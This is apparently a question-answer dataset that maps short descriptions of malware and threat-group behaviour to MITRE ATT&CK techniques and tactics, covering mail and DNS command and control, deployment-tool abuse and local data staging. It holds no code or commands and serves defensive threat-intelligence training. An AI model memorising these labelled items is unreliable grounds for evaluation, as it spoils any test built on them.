+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla has used SMTP for C2 communications.,"Tecnique: T1071.003 Application Layer Protocol: Mail Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BadPatch uses SMTP for C2.,"Tecnique: T1071.003 Application Layer Protocol: Mail Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Various implementations of CHOPSTICK communicate with C2 over SMTP and POP3.,"Tecnique: T1071.003 Application Layer Protocol: Mail Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CORESHELL can communicate over SMTP and POP3 for C2.,"Tecnique: T1071.003 Application Layer Protocol: Mail Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cannon uses SMTP/S and POP3/S for C2 communications by sending and receiving emails.,"Tecnique: T1071.003 Application Layer Protocol: Mail Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ComRAT can use email attachments for command and control.,"Tecnique: T1071.003 Application Layer Protocol: Mail Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Goopy has the ability to use a Microsoft Outlook backdoor macro to communicate with its C2.,"Tecnique: T1071.003 Application Layer Protocol: Mail Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JPIN can send email over SMTP.,"Tecnique: T1071.003 Application Layer Protocol: Mail Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LightNeuron uses SMTP for C2.,"Tecnique: T1071.003 Application Layer Protocol: Mail Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NavRAT uses the email platform, Naver, for C2 communications, leveraging SMTP.","Tecnique: T1071.003 Application Layer Protocol: Mail Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NightClub can use emails for C2 communications.,"Tecnique: T1071.003 Application Layer Protocol: Mail Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OLDBAIT can use SMTP for C2.,"Tecnique: T1071.003 Application Layer Protocol: Mail Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RDAT can use email attachments for C2 communications.,"Tecnique: T1071.003 Application Layer Protocol: Mail Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec is capable of using SMTP for C2.,"Tecnique: T1071.003 Application Layer Protocol: Mail Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A SUGARDUMP variant used SMTP for C2.,"Tecnique: T1071.003 Application Layer Protocol: Mail Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can use custom communications protocols that ride over SMTP.,"Tecnique: T1071.003 Application Layer Protocol: Mail Protocols, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy uses SMTP and POP3 for C2.,"Tecnique: T1071.003 Application Layer Protocol: Mail Protocols, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors used DNS to tunnel IPv4 C2 traffic.","Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT18 uses DNS for C2 communications.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used remote access tools that leverage DNS in communications with C2.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used DNS for C2 communications.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used Cobalt Strike to encapsulate C2 in DNS traffic.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has used DNS tunneling for C2.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has performed C2 using DNS via A, OPT, and TXT records.","Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang malware RoyalDNS has used DNS for C2.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LazyScripter has leveraged dynamic DNS providers for C2 communications.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used DNS for C2 including the publicly available requestbin.net tunneling service.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper's backdoor has communicated to the C2 over the DNS protocol.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Variants of Anchor can use DNS tunneling to communicate with C2.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BONDUPDATER can use DNS and TXT records within its DNS tunneling protocol for command and control.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 can use DNS over HTTPS for C2.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can use a custom command and control protocol that can be encapsulated in DNS. All protocols use their standard assigned ports.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobian RAT uses DNS for C2.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DanBot can use use IPv4 A records and IPv6 AAAA DNS records in C2 communications.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate can cloak command and control traffic in DNS records from legitimate services to avoid reputation-based detection techniques.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Denis has used DNS tunneling for C2 communications.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DnsSystem can direct queries to custom DNS servers and return C2 commands using TXT records.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ebury has used DNS requests over UDP port 53 for C2.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium has the ability to use DNS in communication with C2.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Goopy has the ability to communicate with its C2 over DNS.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Green Lambert can use DNS for C2 communications.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HTTPBrowser has used DNS for command and control.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Helminth can use DNS for C2.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Heyoka Backdoor can use DNS tunneling for C2 communications.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole has used a custom implementation of DNS tunneling to embed C2 communications in DNS requests and replies.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Variants of Kevin can communicate over DNS through queries to the server for constructed domain names with embedded information.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Matryoshka uses DNS for C2.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Milan has the ability to use DNS for C2 communications.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mori can use DNS tunneling to communicate with C2.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mythic supports DNS-based C2 profiles.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanHaiShu uses DNS for the C2 communications.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NightClub can use a DNS tunneling plugin to exfiltrate data by adding it to the subdomain portion of a DNS request.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSOURCE uses DNS TXT records for C2.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWRUNER can use DNS for C2 communications.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pisloader uses DNS as its C2 protocol.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX can be configured to use DNS for command and control.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUADAGENT uses DNS for C2 communications.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RDAT has used DNS to communicate with the C2.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec is capable of using DNS for C2.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SOUNDBITE communicates via DNS for C2.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST used DNS for C2 traffic designed to mimic normal SolarWinds API communications.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShadowPad has used DNS tunneling for C2 communications.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shark can use DNS in C2 communications.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sliver can support C2 communications over DNS.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT can communicate over DNS with the C2 server.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate has used DNS TXT requests as for its C2 communication.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TEXTMATE uses DNS TXT records for C2.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos has encoded outbound C2 communications in DNS requests consisting of character strings made to resemble standard domain names. The actual information transmitted by Uroburos is contained in the part of the character string prior to the first ‘.’ character.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMess has the ability to use DNS tunneling for C2 communications.,"Tecnique: T1071.004 Application Layer Protocol: DNS, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0018, the threat actors used PDQ Deploy to move AvosLocker and tools across the network.","Tecnique: T1072 Software Deployment Tools, Tactic: TA0002 Execution TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 compromised McAfee ePO to move laterally by distributing malware as a software deployment task.,"Tecnique: T1072 Software Deployment Tools, Tactic: TA0002 Execution TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used the commercially available tool RemoteExec for agentless remote code execution.,"Tecnique: T1072 Software Deployment Tools, Tactic: TA0002 Execution TA0008 Lateral Movement "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has used RAdmin, a remote software tool used to remotely control workstations and ATMs.","Tecnique: T1072 Software Deployment Tools, Tactic: TA0002 Execution TA0008 Lateral Movement "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-1314 actors used a victim's endpoint management platform, Altiris, for lateral movement.","Tecnique: T1072 Software Deployment Tools, Tactic: TA0002 Execution TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: It is believed that a patch management system for an anti-virus product commonly installed among targeted companies was used to distribute the Wiper malware.,"Tecnique: T1072 Software Deployment Tools, Tactic: TA0002 Execution TA0008 Lateral Movement "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider stages data in a centralized database prior to exfiltration.,"Tecnique: T1074 Data Staged, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has staged collected data in password-protected archives.,"Tecnique: T1074 Data Staged, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has collected and staged credentials and network enumeration information, using the networkdll and psfin TrickBot modules.","Tecnique: T1074 Data Staged, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kevin can create directories to store logs and other collected data.,"Tecnique: T1074 Data Staged, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kobalos can write captured SSH connection credentials to a file under the /var/run directory with a .pid extension for exfiltration.,"Tecnique: T1074 Data Staged, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUIETCANARY has the ability to stage data prior to exfiltration.,"Tecnique: T1074 Data Staged, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shark has stored information in folders named `U1` and `U2` prior to exfiltration.,"Tecnique: T1074 Data Staged, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, PowerView's file share enumeration results were stored in the file `c:\ProgramData\found_shares.txt`.","Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 copied the local `SAM` and `SYSTEM` Registry hives to a staging directory.","Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the C0032 campaign, TEMP.Veles used staging folders that are infrequently used by legitimate users or processes to store data for exfiltration and tool deployment.","Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, stolen data was copied into a text file using the format `From (- --).txt` prior to compression, encoding, and exfiltration.","Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors staged archived files in a temporary directory prior to exfiltration.","Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has stored captured credential information in a file named pi.log.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has been known to stage files for exfiltration in a single location.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has utilized tools to aggregate data prior to exfiltration.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has staged data on compromised systems prior to exfiltration often in `C:\Users\Public`.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackdoorDiplomacy has copied files of interest to the main drive's recycle bin.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has staged stolen data locally on compromised hosts.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has created a directory named ""out"" in the user's %AppData% folder and copied files to it.","Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has utilized the following temporary folders on compromised Windows and Linux systems for their operations prior to exfiltration: `C:\Windows\Temp` and `/tmp`.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN5 scripts save memory dump data into a specific directory on hosts in the victim environment.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM compressed and staged files in multi-part archives in the Recycle Bin prior to exfiltration.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Indrik Spider has stored collected date in a .tmp file.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has staged collected data files under C:\Program Files\Common Files\System\Ole DB\.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is saved in the %TEMP% directory, then compressed, encrypted, and uploaded to a C2 server.","Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has used C:\Windows\Debug and C:\Perflogs as staging directories.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has stored a decoy PDF file within a victim's `%temp%` folder.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has stored collected credential files in c:\windows\temp prior to exfiltration. Mustang Panda has also stored documents for exfiltration in a hidden folder on USB drives.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork copied all targeted files to a directory called index that was eventually uploaded to the C&C server.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has collected stolen files in a temporary folder in preparation for exfiltration.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has aggregated collected credentials in text files before exfiltrating.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has locally staged encrypted archives for later exfiltration efforts.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has saved stolen files including the ntds.dit database and the `SYSTEM` and `SECURITY` Registry hives locally to the `C:\Windows\Temp\` directory.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has staged ZIP files in local directories such as, `C:\PerfLogs\1\` and `C:\User\1\` prior to exfiltration.","Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass stages data prior to exfiltration in multi-part archives, often saved in the Recycle Bin.","Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ADVSTORESHELL stores output from command execution in a .dat file in the %TEMP% directory.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed can stage files in a central location prior to exfiltration.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth collects data in a plaintext file named r1.log before exfiltration.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor has staged collected data in a central upload directory prior to exfiltration.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AuTo Stealer can store collected data from an infected host to a file named `Hostname_UserName.txt` prior to exfiltration.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADNEWS copies documents under 15MB found on the victim system to is the user's %temp%\SMB\ folder. It also copies files from USB devices to a predefined directory.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BadPatch stores collected data in log files before exfiltration.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoxCaon has created a working folder for collected files that it sends to the C2 server.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Calisto uses a hidden directory named .calisto to store data from the victim’s machine before exfiltration.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbon creates a base directory that contains the files and folders that are collected.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Catchamas stores the gathered data from the machine in .db files and .bmp files under four separate locations.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chrommme can store captured system information locally prior to exfiltration.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crutch has staged stolen files in the C:\AMD\Temp directory.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman can stage local data in the Windows Registry.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dtrack can save collected data to disk, different file formats, and network shares.","Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Modules can be pushed to and executed by Duqu that copy data to a staging area, compress it, and XOR encrypt it.","Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DustySky created folders in temp directories to host collected files before exfiltration.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dyre has the ability to create files in a TEMP folder to act as a database to store information.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ECCENTRICBANDWAGON has stored keystrokes and screenshots within the %temp%\GoogleChrome, %temp%\Downloads, and %temp%\TrendMicroUpdate directories.","Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Elise creates a file in AppData\Local\Microsoft\Windows\Explorer and stores all harvested data in that file.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Exaramel for Windows specifies a path to store files scheduled for exfiltration.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FLASHFLOOD stages data it copies from the local system or removable drives in the ""%WINDIR%\$NtUninstallKB885884$\"" directory.","Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FrameworkPOS can identifiy payment card track data on the victim and copy it to a local file in a subdirectory of C:\Windows\.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can stage collected information including screen captures and logged keystrokes locally.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gold Dragon stores information gathered from the endpoint in a file named 1.hwp.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Helminth creates folders to store output from batch scripts prior to sending the information to its C2 server.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole determines a working directory where it stores all the gathered data about the compromised machine.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KGH_SPY can save collected system information to a file named ""info"" before exfiltration.","Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOPILUWAK has piped the results from executed C2 commands to `%TEMP%\result2.dat` on the local machine.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar stages command output and collected data in files before exfiltration.,"Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LightNeuron can store email data in files and directories specified in its configuration, such as C:\Windows\ServiceProfiles\NetworkService\appdata\Local\Temp\.","Tecnique: T1074.001 Data Staged: Local Data Staging, Tactic: TA0009 Collection"
